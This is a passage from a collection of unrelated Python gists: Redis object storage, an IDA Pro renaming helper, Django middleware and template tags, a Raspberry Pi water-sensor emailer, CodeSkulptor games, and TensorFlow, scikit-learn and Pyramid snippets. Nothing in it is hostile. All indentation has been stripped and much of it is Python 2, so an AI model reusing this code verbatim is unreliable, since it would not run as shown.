"""
Saves multiple objects in one operation using a mset
"""
pairs = {}
for each in objs:
pairs.update(_make_pairs(each))
mset(db, pairs)
def delete(db, obj):
[db.delete(each) for each in keys(db, obj.__class__.__name__, obj.get_identity())]
def read(db, class_name, identity):
obj = getattr(domain, class_name)()
result_keys = keys(db, class_name, identity)
results = mget(db, result_keys)
[setattr(obj, _extract_attribute(k), v) for k,v in zip(result_keys, results)]
return obj
def read_attribute(db, class_name, identity, attrib):
basic_key = _make_basic_key(class_name, identity)
return get(db, basic_key + attrib)
""" Privates for key building"""
def _extract_attribute(key):
return key.split(_sep())[-1]
def _sep():
return '::'
def _make_basic_key(class_name, identity):
return 'qackle' + _sep() + class_name + _sep() + identity + _sep()
def _make_key_pattern(class_name, identity):
return _make_basic_key(class_name, identity) + '*'
""" Privates for object attributes"""
def _get_attributes(obj):
return [each for each in dir(obj) if not each.startswith('_') and not callable(getattr(obj, each))]
def _make_pairs(obj):
"""
Returns a dict where the keys are keys that denote an object property and value is the value
of that property
"""
attributes = _get_attributes(obj)
pairs = {}
for each in attributes:
pairs[make_attribute_key(obj, each)] = getattr(obj, each)
return pairs
```
#### File: hard-gists/5409581/snippet.py
```python
from pyfbsdk import *
def get_first(f, xs):
'''
Returns the first x in xs for which f returns True, or else None.
'''
for x in xs:
if f(x):
return x
return None
def get_selected_relation_box():
'''
Returns a relation constraint box which has been selected by the user, or
None if no relation boxes are selected.
'''
for relation in [c for c in FBSystem().Scene.Constraints if c.Is(FBConstraintRelation_TypeInfo())]:
box = get_first(lambda box: box.Selected, relation.Boxes)
if box:
return box
return None
def get_new_box_name(box):
'''
Prompts the user to enter a new name for the given box. Returns the new
name if the user confirms the rename operation, or None if the user
cancels.
'''
button, string = FBMessageBoxGetUserValue(
'Rename Box?',
'Current name: %s' % box.Name,
box.Name,
FBPopupInputType.kFBPopupString,
'Rename',
'Cancel')
return string if button == 1 else None
def rename_selected_relation_box():
'''
Prompts the user to enter a new name for a selected relation constraint
box. If no boxes are selected, has no effect.
'''
box = get_selected_relation_box()
if box:
name = get_new_box_name(box)
if name:
box.Name = name
if __name__ in ('__main__', '__builtin__'):
rename_selected_relation_box()
```
#### File: hard-gists/540f615dd9d54de47dc52b0ca60522c1/snippet.py
```python
import idc
import idaapi
import idautils
def rename_sub_functions(fva, prefix):
sub_funcs = set([])
for f in idautils.Functions():
for xref in idautils.XrefsTo(f):
subf = idaapi.get_func(xref.frm)
if not subf:
continue
if subf.startEA == fva:
sub_funcs.add(f)
break
for sub_func in sub_funcs:
current_name = idc.GetFunctionName(sub_func)
if current_name.startswith(prefix):
continue
new_name = prefix + current_name
idc.MakeName(sub_func, new_name)
if __name__ == '__main__':
rename_sub_functions(idc.ScreenEA(), "test_")
```
#### File: hard-gists/5441be08c6d80ca55040678bcd79c3c5/snippet.py
```python
from django.conf import settings
from django.http import HttpResponsePermanentRedirect
from django.utils.deprecation import MiddlewareMixin
from django.utils.encoding import escape_uri_path, iri_to_uri
class RemoveTrailingSlashesMiddleware(MiddlewareMixin):
"""Removes all trailing slashes from URL path."""
def process_request(self, request):
"""Removes backslashes from path_info.
Args:
request: User HTTP request.
Returns:
request with changes on the path info (URL).
"""
if request.path[-2:] == '//':
new_path = request.path.rstrip('/')
new_url = '{}{}{}'.format(
escape_uri_path(new_path),
'/' if settings.APPEND_SLASH else '',
(
('?' + iri_to_uri(request.META.get('QUERY_STRING', '')))
if request.META.get('QUERY_STRING', '') else ''
)
)
return HttpResponsePermanentRedirect(new_url)
```
#### File: hard-gists/5473058/snippet.py
```python
from matplotlib import pylab # .exe install is on sourceforge
import numpy# easy_install numpy
from mpl_toolkits.basemap import Basemap # easy_install basemap
# functions to create some random data points and convert them to meters via the map projection
def create_points_in_lon_lat(N=10000):
return zip(numpy.random.standard_normal(N)*360, numpy.random.standard_normal(N) * 45)
def convert_lon_lat_points_to_meters_using_transform(points, tran):
# maybe there is a better way to get long/lat into meters but this works ok
return numpy.array([tran(long,lat) for long,lat in points])
# creates an object called map which can plot various things on different projections
map = Basemap(llcrnrlon=-90,llcrnrlat=-90,urcrnrlon=270,urcrnrlat=90,projection='mill')
# get random points in meters
points = convert_lon_lat_points_to_meters_using_transform(create_points_in_lon_lat(), map.projtran)
# draw the hexbin
# points[:,i]: selects all rows but just the ith column - used to turn
# list or long,lat pairs into lists of just long and lat but in the same order.
# gridsize: set the number of hexagons in the x and y dimension
# mincnt: set the minimum count in a hexagon for it to be drawn
# cmap: set the colour map to use
map.hexbin(points[:,0],points[:,1], gridsize=(200,30),mincnt=1,cmap=pylab.cm.Purples)
# draw some features - the basemap object come with these build in but you can load
# features in from a wide range of formats
map.drawcoastlines()
# show the resulting plot in the interactive viewer (waits till figure is closed before continuing)
pylab.show()
# or you could save it directly to a file like this:
#pylab.savefig('hexbintestmap.png')
# see also:
# http://matplotlib.org/basemap/users/examples.html
```
#### File: hard-gists/5480533/snippet.py
```python
username = 'exampleusername' #you don't need the "@gmail.com" bit.
password = '<PASSWORD>'
############################
# General Email Parameters #
############################
From = "<EMAIL>"
To = "recipientaddress#domain.com"
#######################################
# Email Parameters when sensor is Wet #
#######################################
Subject_wet = "RPi Water Sensor is WET"
Body_wet = "Your water sensor is wet."
#######################################
# Email Parameters when semsor is Dry #
#######################################
Subject_dry = "RPi Water Sensor is DRY"
Body_dry = " Your water sensor is dry again!"
import smtplib
from email.mime.text import MIMEText
import RPi.GPIO as GPIO
import string
import time
# Function Definitions
#takes either "wet" or "dry" as the condition.
def email(condition):
print "Attempting to send email"
if condition == 'wet':
Body = string.join((
"From: %s" % From,
"To: %s" % To,
"Subject: %s" % Subject_wet,
"",
Body_wet,
), "\r\n")
if condition == 'dry':
Body = string.join((
"From: %s" % From,
"To: %s" % To,
"Subject: %s" % Subject_dry,
"",
Body_dry,
), "\r\n")
# The actual mail send
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
print "Logging in..."
server.login(username,password)
print "Logged in as "+username+"."
server.sendmail(From, [To], Body)
server.quit()
print "Email sent."
#Tests whether wter is present.
# returns 0 for dry
# returns 1 for wet
# tested to work on pin 18
def RCtime (RCpin):
reading = 0
GPIO.setmode(GPIO.BCM)
GPIO.setup(RCpin, GPIO.OUT)
GPIO.output(RCpin, GPIO.LOW)
time.sleep(0.1)
GPIO.setup(RCpin, GPIO.IN)
# This takes about 1 millisecond per loop cycle
while True:
if (GPIO.input(RCpin) == GPIO.LOW):
reading += 1
if reading >= 1000:
return 0
if (GPIO.input(RCpin) != GPIO.LOW):
return 1
# Turns on the piezo buzzer
# tested to work on pin 17
def buzz_on (pin):
GPIO.setmode(GPIO.BCM)
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin, GPIO.HIGH)
# Turns off the piezo buzzer
# tested to work on pin 17
def buzz_off(pin):
GPIO.setmode(GPIO.BCM)
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin, GPIO.LOW)
# Main Loop
print 'Waiting for wetness...'
while True:
time.sleep(1) # check for wetness every second
if RCtime(18) == 1:
buzz_on(17)
print "Sensor is wet"
email('wet')
print "Waiting for dryness..."
while True:
time.sleep(1) # check for dryness every second
if RCtime(18) == 0:
buzz_off(17)
print "Sensor is dry again"
email('dry')
print "Waiting for wetness..."
break
```
#### File: hard-gists/5520379/snippet.py
```python
from ghost import Ghost
from functools import wraps
def fix_redirect(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
page, resources = func(self, *args, **kwargs)
if resources and 300 <= resources[0].http_status <= 399:
nextUrl = resources[0].headers['Location']
page, resources = self.open(nextUrl)
return page, resources
return wrapper
class GhostRedirectFix(Ghost):
@fix_redirect
def open(self, *args, **kwargs):
return Ghost.open(self, *args, **kwargs)
@fix_redirect
def click(self, *args, **kwargs):
return Ghost.click(self, *args, **kwargs)
@fix_redirect
def evaluate(self, *args, **kwargs):
return Ghost.evaluate(self, *args, **kwargs)
@fix_redirect
def fill(self, *args, **kwargs):
return Ghost.fill(self, *args, **kwargs)
@fix_redirect
def fire_on(self, *args, **kwargs):
return Ghost.fire_on(self, *args, **kwargs)
@fix_redirect
def set_field_value(self, *args, **kwargs):
return Ghost.set_field_value(self, *args, **kwargs)
def find_elements_by_tag_name(self, tag):
return self.find_element_by_css_selector(tag)
browser = GhostRedirectFix()
```
#### File: hard-gists/5544335/snippet.py
```python
import uuid
from django import template
from django.template.base import Token, TOKEN_BLOCK
register = template.Library()
class MapNode(template.Node):
def __init__(self, var_name, tag, list):
self.var_name = var_name
self.tag = tag
self.list = template.Variable(list)
def render(self, context):
res = []
context.push()
for i in self.list.resolve(context):
context[self.var_name] = i
res.append(self.tag.render(context))
context.pop()
return ''.join(res)
@register.tag
def map(parser, token):
_, tag_name, list = token.split_contents()
var_name = uuid.uuid4().hex
fake_token = Token(TOKEN_BLOCK, '%s %s' % (tag_name, var_name))
tag = parser.tags[tag_name](parser, fake_token)
return MapNode(var_name, tag, list)
# {% map include list_of_templates %}
# {# is like ... #}
# {% for template in list_of_templates %}
# {% include template %}
# {% endfor %}
```
#### File: hard-gists/5553364/snippet.py
```python
import simplegui
import random
# initialize global variables used in your code
max_range = 100
guesses = int() # placeholder, look at init()
message = dict() # placeholder, look at init()
old_message = dict() # placeholder, look at init()
random_number = int() # placeholder, look at init()
max_guesses = int() # placeholder, look at init()
# canvas constants
FONT_SIZE = 14
CANVAS_WIDTH = 420
CANVAS_HEIGHT = 180
AVATAR_SIZE = 40
MARGIN = 6
AVATAR_COORD = {"player": AVATAR_SIZE // 2 + MARGIN,
"python": CANVAS_WIDTH - MARGIN - AVATAR_SIZE // 2}
BUBBLE_MARGIN = {"player": (AVATAR_SIZE + (2 * MARGIN), CANVAS_WIDTH - MARGIN),
"python": (MARGIN, CANVAS_WIDTH - (2 * MARGIN) - AVATAR_SIZE)}
AVATAR = {"python": simplegui.load_image("http://goo.gl/DZjuc"),
"player": simplegui.load_image("http://goo.gl/4fJNf")}
# canvas animation constants
time = 0 # global time
TRANSITION = 5 # transition duration
# helper functions
def init():
global old_message, message, random_number, guesses, max_guesses
# restart number of guesses
guesses = 0
# set max number of guesses
if max_range == 100:
max_guesses = 7
else:
max_guesses = 10
# get random number
random_number = random.randint(0, max_range - 1)
# message is a dictionary holding the logging messages,
# keys represent the player name and values the messages.
# Values are stored in a list because canvas.draw_text()
# can't handle multiline strings automatically.
message = {"python": ["Do you wanna play 'guess the number'?",
"I am thinking of a number between 0 and %s (inclusive)." % str(max_range - 1),
"Take a guess!"],
"player": list()}
old_message = message # buffer for transition
print "\n--- NEW GAME ---"
log_to_console()
def log_to_console():
# Log message dict to the console
for player in ("player", "python"):
for text in message.get(player):
print "%s: %s" % (player, text)
# define event handlers for control panel
def tick():
# simple timer, this is necessary to animate transitions
# between sessions on the canvas.
global time
time += 1
def range100():
# button that changes range to range [0,100) and restarts
global max_range
max_range = 100
init()
def range1000():
# button that changes range to range [0,1000) and restarts
global max_range
max_range = 1000
init()
def get_input(guess):
global message, guesses, time
# assign your guess to the player message
message["player"] = [guess]
# validate
if not guess or not (0 <= int(guess) < max_range):
message["python"] = ["Pick a number between 0 and %s, try again..." % str(max_range - 1)]
log_to_console()
time = 0 # restart time
timer.start() # start transition
return
# count guesses
guess = int(guess)
guesses += 1
# check for a new game
if max_guesses - guesses < 0:
return init()
# check for a winner
elif guess == random_number:
message["python"] = ["Good job!",
"You guessed my number in %s guesses :)" % guesses,
"",
"Do you wanna play again?"]
guesses = 8 # start a new game
# check for game over
elif max_guesses - guesses == 0:
message["python"] = ["Oops!! No turns left :(",
"My number was %s..." % random_number,
"",
"Do you wanna play again?"]
guesses = 8 # start a new game
# keep playing
else:
comp_guess = "high"
if guess < random_number:
comp_guess = "low"
message["python"] = ["Your guess is too %s!" % comp_guess,
"You have %s turns left." % str(max_guesses - guesses),
"Try again..."]
log_to_console()
time = 0 # retart timeline
timer.start() # start transition
def draw(canvas):
# optional event handler, this function draws a chat/log window
# showing the last interaction between the user and the system
# directly into the canvas.
next_page = False
for text in (old_message, message):
base_height = 0 # base y coordinate for each message group
for player in ("player", "python"):
message_length = len(message.get(player))
if not message_length:
continue # if there's no message for this player, skip this iteration
offset = (CANVAS_HEIGHT * time / TRANSITION) # y coord offset for next page
# render avatar
avatar_posy = (AVATAR_SIZE // 2) + MARGIN + base_height - offset
if next_page:
avatar_posy += CANVAS_HEIGHT
canvas.draw_image(AVATAR.get(player),
(40, 40), (80, 80),
(AVATAR_COORD.get(player), avatar_posy),
(AVATAR_SIZE, AVATAR_SIZE))
# render bubble
bubble_height = (message_length * FONT_SIZE) + ((message_length + 1) * MARGIN)
bubble_posy = [MARGIN + base_height - offset,
bubble_height + base_height - offset]
if next_page:
bubble_posy[0] = bubble_posy[0] + CANVAS_HEIGHT
bubble_posy[1] = bubble_posy[1] + CANVAS_HEIGHT
canvas.draw_polygon([(BUBBLE_MARGIN.get(player)[0], bubble_posy[0]),
(BUBBLE_MARGIN.get(player)[0], bubble_posy[1]),
(BUBBLE_MARGIN.get(player)[1], bubble_posy[1]),
(BUBBLE_MARGIN.get(player)[1], bubble_posy[0])],
1, "Silver", "White")
# render text
i = 0 # line number
for text in message.get(player):
text_posy = (1 + i) * (MARGIN + FONT_SIZE) + base_height - offset
if next_page:
text_posy += CANVAS_HEIGHT
canvas.draw_text(text, (BUBBLE_MARGIN.get(player)[0] + 2,
text_posy),
FONT_SIZE, "Black", "sans-serif")
i += 1 # acumulate line number
# acumulate y coordinate to use it in the next message group
if bubble_height > AVATAR_SIZE:
base_height += bubble_height
else:
base_height += AVATAR_SIZE + MARGIN
# change to next page offset
next_page = True
if time >= TRANSITION:
timer.stop()
# create frame
frame = simplegui.create_frame("Guess the number", CANVAS_WIDTH, CANVAS_HEIGHT)
frame.set_canvas_background("Gray")
# register event handlers for control elements
frame.add_button("Range is [0-100)", range100, 200)
frame.add_button("Range is [0-1000)", range1000, 200)
frame.add_input("Enter a guess:", get_input, 195)
frame.set_draw_handler(draw) # canvas handler, used to draw stuff on the canvas
timer = simplegui.create_timer(1000//30, tick) # timer handler, used by transitions
# start frame
init()
frame.start()
```
#### File: hard-gists/561bf3bf6c1477d99e7b/snippet.py
```python
from cassandra.cluster import Cluster, OperationTimedOut
from cassandra.decoder import SyntaxException
from tornado.concurrent import Future
from tornado.testing import AsyncTestCase, gen_test
class TornadoCassandra(object):
def __init__(self, session, ioloop):
self._session = session
self._ioloop = ioloop
def execute(self, *args, **kwargs):
tornado_future = Future()
cassandra_future = self._session.execute_async(*args, **kwargs)
self._ioloop.add_callback(
self._callback, cassandra_future, tornado_future)
return tornado_future
def _callback(self, cassandra_future, tornado_future):
try:
# should spend just about no time blocking.
result = cassandra_future.result(timeout=0)
except OperationTimedOut:
return self._ioloop.add_callback(
self._callback, cassandra_future, tornado_future)
except Exception, exc:
return tornado_future.set_exception(exc)
tornado_future.set_result(result)
class TestTornadoCassandra(AsyncTestCase):
def setUp(self):
super(TestTornadoCassandra, self).setUp()
self.cluster = Cluster(["127.0.0.1"])
self.session = self.cluster.connect()
self.session.execute(
"CREATE KEYSPACE IF NOT EXISTS testingfuture WITH REPLICATION = "
"{ 'class': 'SimpleStrategy', 'replication_factor': 1 }")
self.session.execute("USE testingfuture;")
self.session.execute(
"CREATE TABLE IF NOT EXISTS footable (\n"
"key VARCHAR, \n"
"url VARCHAR, \n"
"PRIMARY KEY (key));")
self.session.execute(
"INSERT INTO footable (key, url) "
"VALUES (%s, %s)", ("foobar", "http://foo.com"))
self.connection = TornadoCassandra(self.session, ioloop=self.io_loop)
def tearDown(self):
super(TestTornadoCassandra, self).tearDown()
self.session.execute("DROP KEYSPACE testingfuture;")
@gen_test
def test_query(self):
results = yield self.connection.execute(
"SELECT key, url FROM footable;")
self.assertEqual(1, len(results))
self.assertEqual(("foobar", "http://foo.com"), results[0])
@gen_test
def test_exception(self):
with self.assertRaises(SyntaxException):
yield self.connection.execute("foobar!")
@gen_test
def test_lots_of_queries(self):
futures = []
count = 2048
for i in range(count):
futures.append(self.connection.execute(
"SELECT key FROM footable;"))
results = 0
for future in futures:
yield future
results += 1
self.assertEqual(count, results)
```
#### File: hard-gists/561d5eec7fed9ebf48751d124a77b087/snippet.py
```python
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.ops import gen_nn_ops
@ops.RegisterGradient("GuidedRelu")
def _GuidedReluGrad(op, grad):
return tf.select(0. < grad, gen_nn_ops._relu_grad(grad, op.outputs[0]), tf.zeros(grad.get_shape()))
if __name__ == '__main__':
with tf.Session() as sess:
g = tf.get_default_graph()
x = tf.constant([10., 2.])
with g.gradient_override_map({'Relu': 'GuidedRelu'}):
y = tf.nn.relu(x)
z = tf.reduce_sum(-y ** 2)
tf.initialize_all_variables().run()
print x.eval(), y.eval(), z.eval(), tf.gradients(z, x)[0].eval()
# > [ 10. 2.] [ 10. 2.] -104.0 [ 0. 0.]
```
#### File: hard-gists/5623772/snippet.py
```python
from django.contrib.gis.measure import D
def nearby(point, radius, unit):
"""Lists the nearest points to `point`, includes the distance from the point.
Sorted in ascending order (from closest to furthest point).
- radius, the distance to limit the search
- unit, can be kilometers or miles, etc.
returns a QuerySet.
See: https://docs.djangoproject.com/en/dev/ref/contrib/gis/geoquerysets/#distance
"""
qs = MyModel.objects.all()
qs = qs.filter(point__distance_lte=(point, D(**{unit: radius})))
qs = qs.distance(point) # at this point, the type of queryset is GeoQuerySet
qs = qs.order_by('distance')
return qs
nearest = nearby(Point(x, y), 5, 'km')
# => [point1, point2, ...., pointN]
print nearest[0].distance
# => '2392903 m'
```
#### File: hard-gists/5633266/snippet.py
```python
from collections import defaultdict
import re
import numpy as np
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction import FeatureHasher
from sklearn.linear_model.stochastic_gradient import SGDClassifier
from sklearn.externals import joblib
def tokens(doc):
"""Extract tokens from doc.
This uses a simple regex to break strings into tokens. For a more
principled approach, see CountVectorizer or TfidfVectorizer.
"""
return (tok.lower() for tok in re.findall(r"\w+", doc))
def token_freqs(doc):
"""Extract a dict mapping tokens from doc to their frequencies."""
freq = defaultdict(int)
for tok in tokens(doc):
freq[tok] += 1
return freq
def chunker(seq, size):
"""Iterate by chunks on a sequence. Here we simulate what reading
from a stream would do by using a generator."""
for pos in xrange(0, len(seq), size):
yield seq[pos:pos + size]
categories = [
'alt.atheism',
'comp.graphics',
'comp.sys.ibm.pc.hardware',
'misc.forsale',
'rec.autos',
'sci.space',
'talk.religion.misc',
]
dataset = fetch_20newsgroups(subset='train', categories=categories)
classif_data = zip(dataset.data, dataset.target)
classes = np.array(list(set(dataset.target)))
hasher = FeatureHasher()
classifier = SGDClassifier()
for i, chunk in enumerate(chunker(classif_data, 100)):
messages, topics = zip(*chunk)
X = hasher.transform(token_freqs(msg) for msg in messages)
y = np.array(topics)
classifier.partial_fit(X,
topics,
classes=classes)
if i % 100 == 0:
# dump model to be able to monitor quality and later
# analyse convergence externally
joblib.dump(classifier, 'model_%04d.pkl' % i)
```
#### File: hard-gists/5660624/snippet.py
```python
from wsgiref.simple_server import make_server
from pyramid.config import Configurator
from pyramid.response import Response
from pyramid.compat import text_type
from sqlalchemy.orm import scoped_session
from sqlalchemy.orm import sessionmaker
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import relationship
from sqlalchemy.orm import backref
from sqlalchemy.orm import joinedload
import sqlalchemy as sa
from caching_query import FromCache
from caching_query import RelationshipCache
from caching_query import query_callable
from dogpile.cache import make_region
import hashlib
cache_region = make_region()
regions = {
"default": cache_region
}
DBSession = scoped_session(
sessionmaker(query_cls=query_callable(regions))
)
def md5_key_mangler(key):
"""Receive cache keys as long concatenated strings;
distill them into an md5 hash.
"""
d = hashlib.md5(key.encode('utf-8'))
return d.hexdigest()
class BaseModel(object):
@declared_attr
def pk(self):
return sa.Column(sa.Integer, primary_key=True)
@declared_attr
def date_created(self):
return sa.Column(sa.DateTime)
Base = declarative_base(cls=BaseModel)
class User(Base):
__tablename__ = 'users'
username = sa.Column(sa.String)
class UserProfile(Base):
__tablename__ = 'user_profile'
first_name = sa.Column(sa.Unicode(255))
user_pk = sa.Column(sa.Integer, sa.ForeignKey(User.pk))
user = relationship(User, backref=backref('profile', uselist=False))
def get_user_by_username(session, username, with_profile=True,
from_cache=True):
query = session.query(User).filter(
User.username == username
)
if with_profile:
query = query.options(joinedload('profile'))
if from_cache:
print("Pulling from cache")
query = query.options(FromCache())
query = query.options(RelationshipCache(User.profile))
user = query.one()
return user
def hello_world(request):
user = get_user_by_username(DBSession, 'sontek')
return Response('hello! user #%d' % user.pk)
def main():
config = Configurator()
engine = create_engine('sqlite:///foo.db')
DBSession.configure(bind=engine)
Base.metadata.drop_all(engine)
Base.metadata.create_all(engine)
user1 = User(
username=text_type('sontek')
)
profile = UserProfile(
user=user1
, first_name=text_type('John')
)
DBSession.add_all([user1, profile])
cache_settings = {
"cache.redis.backend":"dogpile.cache.redis",
"cache.redis.arguments.host": "localhost",
"cache.redis.arguments.port": 6379,
}
cache_region.configure_from_config(cache_settings, "cache.redis.")
config.add_view(hello_world)
app = config.make_wsgi_app()
return app
if __name__ == '__main__':
app = main()
server = make_server('0.0.0.0', 8080, app)
print("Serving at: http://0.0.0.0:8080")
server.serve_forever()
```
#### File: hard-gists/5663cc76aa329b2ddfb5/snippet.py
```python
import os
import signal
import json
from urllib2 import Request, urlopen, URLError
from gi.repository import Gtk as gtk
from gi.repository import AppIndicator3 as appindicator
from gi.repository import Notify as notify
APPINDICATOR_ID = 'myappindicator'
def main():
indicator = appindicator.Indicator.new(APPINDICATOR_ID, os.path.abspath('sample_icon.svg'), appindicator.IndicatorCategory.SYSTEM_SERVICES)
indicator.set_status(appindicator.IndicatorStatus.ACTIVE)
indicator.set_menu(build_menu())
notify.init(APPINDICATOR_ID)
gtk.main()
def build_menu():
menu = gtk.Menu()
item_joke = gtk.MenuItem('Joke')
item_joke.connect('activate', joke)
menu.append(item_joke)
item_quit = gtk.MenuItem('Quit')
item_quit.connect('activate', quit)
menu.append(item_quit)
menu.show_all()
return menu
def fetch_joke():
request = Request('http://api.icndb.com/jokes/random?limitTo=[nerdy]')
response = urlopen(request)
joke = json.loads(response.read())['value']['joke']
return joke
def joke(_):
notify.Notification.new("<b>Joke</b>", fetch_joke(), None).show()
def quit(_):
notify.uninit()
gtk.main_quit()
if __name__ == "__main__":
signal.signal(signal.SIGINT, signal.SIG_DFL)
main()
```
#### File: hard-gists/5684769/snippet.py
```python
import numpy as np
import pylab
from scipy.optimize import curve_fit
def sigmoid(x, x0, k):
y = 1 / (1 + np.exp(-k*(x-x0)))
return y
xdata = np.array([0.0, 1.0, 3.0, 4.3, 7.0, 8.0, 8.5, 10.0, 12.0])
ydata = np.array([0.01, 0.02, 0.04, 0.11, 0.43, 0.7, 0.89, 0.95, 0.99])
popt, pcov = curve_fit(sigmoid, xdata, ydata)
print popt
x = np.linspace(-1, 15, 50)
y = sigmoid(x, *popt)
pylab.plot(xdata, ydata, 'o', label='data')
pylab.plot(x,y, label='fit')
pylab.ylim(0, 1.05)
pylab.legend(loc='best')
pylab.show()
```
#### File: hard-gists/5696520/snippet.py
```python
import simplegui
import math
import random
# globals for user interface
WIDTH = 800
HEIGHT = 600
score = 0
lives = 3
time = 0
class ImageInfo:
def __init__(self, center, size, radius=0, lifespan=None, animated=False):
self.center = center
self.size = size
self.radius = radius
if lifespan:
self.lifespan = lifespan
else:
self.lifespan = float('inf')
self.animated = animated
def get_center(self):
return self.center
def get_size(self):
return self.size
def get_radius(self):
return self.radius
def get_lifespan(self):
return self.lifespan
def get_animated(self):
return self.animated
# art assets created by <NAME>, may be freely re-used in
# non-commercial projects, please credit Kim
# debris images - debris1_brown.png, debris2_brown.png, debris3_brown.png, debris4_brown.png
# debris1_blue.png, debris2_blue.png, debris3_blue.png, debris4_blue.png,
# debris_blend.png
debris_info = ImageInfo([320, 240], [640, 480])
debris_image = simplegui.load_image(
"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/debris2_blue.png")
# nebula images - nebula_brown.png, nebula_blue.png
nebula_info = ImageInfo([400, 300], [800, 600])
nebula_image = simplegui.load_image(
"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/nebula_blue.png")
# splash image
splash_info = ImageInfo([200, 150], [400, 300])
splash_image = simplegui.load_image(
"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/splash.png")
# ship image
ship_info = ImageInfo([45, 45], [90, 90], 35)
ship_image = simplegui.load_image(
"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/double_ship.png")
# missile image - shot1.png, shot2.png, shot3.png
missile_info = ImageInfo([5, 5], [10, 10], 3, 50)
missile_image = simplegui.load_image(
"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/shot2.png")
# asteroid images - asteroid_blue.png, asteroid_brown.png, asteroid_blend.png
asteroid_info = ImageInfo([45, 45], [90, 90], 40)
asteroid_image = simplegui.load_image(
"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/asteroid_blue.png")
# animated explosion - explosion_orange.png, explosion_blue.png,
# explosion_blue2.png, explosion_alpha.png
explosion_info = ImageInfo([64, 64], [128, 128], 17, 24, True)
explosion_image = simplegui.load_image(
"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/explosion_alpha.png")
# sound assets purchased from sounddogs.com, please do not redistribute
soundtrack = simplegui.load_sound(
"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/soundtrack.mp3")
missile_sound = simplegui.load_sound(
"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/missile.mp3")
missile_sound.set_volume(.5)
ship_thrust_sound = simplegui.load_sound(
"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/thrust.mp3")
explosion_sound = simplegui.load_sound(
"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/explosion.mp3")
# helper functions to handle transformations
def angle_to_vector(ang):
return [math.cos(ang), math.sin(ang)]
def dist(p, q):
return math.sqrt((p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2)
# Sprite class
class Sprite():
def __init__(self, pos, vel, angle, angle_vel, image, info, sound=None):
self.pos = [pos[0], pos[1]]
self.vel = [vel[0], vel[1]]
self.angle = angle
self.angle_vel = angle_vel
self.image = image
self.image_center = info.get_center()
self.image_size = info.get_size()
self.radius = info.get_radius()
self.lifespan = info.get_lifespan()
self.animated = info.get_animated()
self.age = 0
self.sound = sound
if self.sound:
self.sound.rewind()
self.sound.play()
def draw(self, canvas):
canvas.draw_image(self.image, self.image_center, self.image_size,
self.pos, self.image_size, self.angle)
def update(self, friction=0.0):
# update orientation
self.angle += self.angle_vel
for i in range(2):
self.vel[i] *= 1 - friction
# update position
limits = (WIDTH, HEIGHT)
for i in range(2):
self.pos[i] += self.vel[i]
self.pos[i] = self.pos[i] % limits[i]
# Ship class, it inherits from Sprite class
class Ship(Sprite):
def __init__(self, *args, **kwds):
Sprite.__init__(self, *args, **kwds) # inherit from sprite
self.thrust = False
if self.sound:
self.sound.pause()
self.sound.rewind()
def set_thrust(self, value):
self.thrust = value
# shift image center and play/pause sound
if value:
self.image_center[0] *= 3
if self.sound:
self.sound.play()
else:
self.image_center[0] /= 3
if self.sound:
self.sound.pause()
self.sound.rewind()
def shoot(self):
# shoot and return a missile (Sprite object)
point_at = angle_to_vector(self.angle)
pos = list(self.pos)
vel = list(self.vel)
for i in range(2):
pos[i] += point_at[i] * self.image_center[0]
vel[i] += point_at[i] * 5
return Sprite(pos, vel, self.angle, 0, missile_image,
missile_info, missile_sound)
def update(self):
# move forward
if self.thrust:
vel = angle_to_vector(self.angle)
for i in range(2):
self.vel[i] += vel[i] * 0.2
# sprite behaviour
Sprite.update(self, 0.01)
# draw handler
def draw(canvas):
global time
# animate background
time += 1
center = debris_info.get_center()
size = debris_info.get_size()
wtime = (time / 8) % center[0]
canvas.draw_image(nebula_image, nebula_info.get_center(),
nebula_info.get_size(), [WIDTH / 2, HEIGHT / 2],
[WIDTH, HEIGHT])
canvas.draw_image(debris_image, [center[0] - wtime, center[1]],
[size[0] - 2 * wtime, size[1]],
[WIDTH / 2 + 1.25 * wtime, HEIGHT / 2],
[WIDTH - 2.5 * wtime, HEIGHT])
# draw lives
canvas.draw_text("Lives", (40, 40), 18, "White", "sans-serif")
canvas.draw_text(str(lives), (40, 64), 18, "White", "sans-serif")
# draw score
canvas.draw_text("Score", (WIDTH - 80, 40), 18, "White", "sans-serif")
canvas.draw_text(str(score), (WIDTH - 80, 64), 18, "White", "sans-serif")
# draw ship and rocks
my_ship.draw(canvas)
a_rock.draw(canvas)
# update ship and rocks
my_ship.update()
a_rock.update()
# draw and update missiles
for i in missiles:
i.draw(canvas)
i.update()
def key_down(key):
global missiles
if simplegui.KEY_MAP.get("up") == key:
my_ship.set_thrust(True)
elif simplegui.KEY_MAP.get("left") == key:
my_ship.angle_vel = -0.1
elif simplegui.KEY_MAP.get("right") == key:
my_ship.angle_vel = 0.1
elif simplegui.KEY_MAP.get("space") == key:
missiles.append(my_ship.shoot())
def key_up(key):
if simplegui.KEY_MAP.get("up") == key:
my_ship.set_thrust(False)
elif simplegui.KEY_MAP.get("left") == key:
my_ship.angle_vel = 0.0
elif simplegui.KEY_MAP.get("right") == key:
my_ship.angle_vel = 0.0
# timer handler that spawns a rock
def rock_spawner():
pos = [random.random() * WIDTH]
pos.append(random.random() * HEIGHT)
a_rock.pos = pos
a_rock.vel = angle_to_vector(random.random() * 2 * 3.141592) # random vel
a_rock.angle_vel = (random.random() - 0.5) * 0.05 # random spin vel
# initialize frame
frame = simplegui.create_frame("Asteroids", WIDTH, HEIGHT)
# initialize ship and two sprites
